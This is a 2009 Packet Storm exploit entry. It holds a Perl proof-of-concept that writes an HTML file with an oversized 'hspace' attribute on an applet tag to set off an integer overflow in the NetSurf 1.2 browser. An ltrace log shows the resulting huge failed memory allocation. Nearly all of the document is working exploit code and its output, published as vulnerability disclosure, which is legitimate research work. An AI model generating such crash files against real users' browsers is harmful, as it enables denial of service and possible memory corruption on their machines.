NetSurf 1.2 hspace Integer Overflow Proof Of Concept

2009-01-15T00:00:00
ID PACKETSTORM:73920
Type packetstorm
Reporter Jeremy Brown
Modified 2009-01-15T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# netsurf_hspace_intof1.pl  
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit  
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]  
#   
# [ltrace log -- hspace = 30000, without --sync]  
#   
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)  
# = 0x8cbda01  
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)  
# = 0  
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)  
# = 0  
# cairo_clip(0xb6600948, 0, 0, 0, 0)  
# = 0xb6600aec  
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)  
# = 0x8cbda01  
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>  
# malloc(3073536192) /// HUGE MALLOC  
# = NULL  
# <... gdk_pixbuf_get_from_drawable resumed> )  
# = 0  
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>  
# free(0xb6600dc8)  
# = <void>  
# free(0xb6600de0)  
# = <void>  
#   
# Adv Ref: netsurf_multiple_adv.txt  
  
$filename = $ARGV[0];  
if(!defined($filename))  
{  
  
print "Usage: $0 <filename.html>\n";  
  
}  
  
$head = "<html>" . "\n";  
$trig = "<applet code=\"test.class\" hspace=\"32767\">" . "\n";  
#$trig = "<img src=\"test.jpg\" hspace=\"32767\">" . "\n";  
$foot = "</html>";  
  
$data = $head . $trig . $foot;  
  
open(FILE, '>' . $filename);  
print FILE $data;  
close(FILE);  
  
exit;`